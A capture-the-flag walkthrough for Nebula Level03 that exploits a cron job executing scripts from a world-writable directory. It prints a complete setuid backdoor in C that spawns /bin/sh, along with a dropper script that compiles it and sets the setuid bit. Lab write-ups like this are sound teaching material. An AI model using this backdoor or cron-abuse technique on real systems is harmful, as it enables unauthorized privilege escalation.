Exploit-Exercice : Nebula
Level03 - This crontab will kill you
In this level take advantage of weak file permission and crontab job to get a shell and get the flag !
Let’s go !
Here is what exploit-exercice tell us about the level
Check the home directory of flag03 and take note of the files there.
There is a crontab that is called every couple of minutes.
To do this level, log in as the level03 account with the password level03. Files for this level can be found in /home/flag03.
Here the script executed by crontab
#!/bin/bash
for i in /home/writable.d/* ; do
(ulimit -t 5; bash -x "$i")
rm -f "$i"
done
The script simply execute all file in /home/writable.d, this directory is set the 777 permission, you have all the right to write, read and execute.
This script will help us to run a shell as flag03
first let’s make a simple suid backdoor in c
vim /tmp/shell.c
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>
int main(int argc, char **argv, char **envp)
{
gid_t gid;
uid_t uid;
gid = getegid();
uid = geteuid();
setresgid(gid, gid, gid);
setresuid(uid, uid, uid);
system("/bin/sh");
return 0;
}
This C program will run as flag03, now in /home/flag03/writable.d/ create a script that will compile and set permission to your shell
#!/bin/bash
gcc /tmp/shell.c -o shell
chmod +s shell
Then run
watch ls -lR /home/flag03/
This will run ls every 2 sec on the flag03 directory, you will see your shell spawn
the -l argument show you permission , and -R list directory recursively
shell is in /home/flag03 directory and is setuid, run it to pwed the level !
Congratulation !
See you for the next level !